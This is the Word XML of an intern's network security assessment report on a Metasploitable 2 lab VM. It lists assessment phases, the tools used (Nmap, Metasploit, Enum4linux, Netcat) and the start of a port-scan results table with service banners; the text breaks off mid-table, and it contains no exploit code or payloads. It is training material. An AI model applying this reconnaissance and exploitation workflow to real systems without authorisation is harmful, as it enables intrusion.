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F497D"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>NETWORK SECURITY ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Module 3: Network Enumeration &amp; Service Exploitation</w:t>
      </w:r>
    </w:p>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1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prepared by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security Intern — Cybersecurity Training Program</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Target System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Metasploitable 2 (192.168.56.101) — Lab Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>August 15, 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CONFIDENTIAL — Lab Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tool Developed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>NetScout v1.0 (github.com/intern/netscout)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This report documents the findings from a network enumeration and service exploitation exercise conducted against an intentionally vulnerable lab environment (Metasploitable 2). The assessment was performed as part of Module 3 of the Cybersecurity Internship Programme, with the objective of identifying open ports, running services, security misconfigurations, and potential attack vectors in a safe, controlled setting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A total of 8 open ports were identified across the target host. Service enumeration revealed multiple critical misconfigurations including anonymous FTP access, SMBv1 exposure, outdated software versions, and missing HTTP security headers. These findings collectively represent a high-risk posture that would be exploitable in a real-world environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Risk Summary</w:t>
      </w:r>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1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1 Target Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All testing was performed within an isolated VirtualBox lab network. The target was a Metasploitable 2 virtual machine — a deliberately vulnerable Linux distribution designed for security training. No production systems, public networks, or third-party infrastructure were involved at any stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Target: 192.168.56.101 (Metasploitable 2)   |   Attacker: 192.168.56.102 (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2 Assessment Phases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Host Discovery: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify live hosts on the lab subnet using ARP scanning and ICMP ping sweeps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Port Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Perform TCP connect scans across well-known and top-1000 port ranges using NetScout and Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Service Enumeration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Probe each open port to identify service versions, configurations, and potential misconfigurations across FTP, SSH, HTTP, and SMB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Banner Grabbing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Collect service banners to fingerprint software versions for vulnerability correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5 — Vulnerability Analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map identified services and configurations to known vulnerability signatures, CVEs, and security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6 — Safe Exploitation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Demonstrate exploitability of confirmed vulnerabilities (anonymous FTP, HTTP path exposure) in the lab environment without causing disruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 7 — Documentation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compile findings, attack paths, and remediation recommendations into this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3 Tools Used</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>NetScout v1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Custom Python tool developed for this assessment — port scanning, banner grabbing, service enumeration, vulnerability analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap 7.94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network mapper for SYN scan confirmation, OS detection, and NSE script enumeration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Metasploit 6.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation framework for confirming exploitability of FTP backdoor and SMB vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enum4linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Linux-based SMB/NetBIOS enumeration tool for share listing and user enumeration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Manual banner grabbing and raw service probing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Packet capture for protocol analysis and cleartext credential verification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3. Network Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1 Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A ping sweep of the 192.168.56.0/24 subnet was performed using NetScout's --sweep mode alongside Nmap's -sn option. One live host was identified: 192.168.56.101.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 Port Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TCP connect scans were performed across common and top-1000 port ranges. The following ports were found open on the target host:</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F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Banner / Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>220 (vsFTPd 2.3.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>220 metasploitable.localdomain ESMTP Postfix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
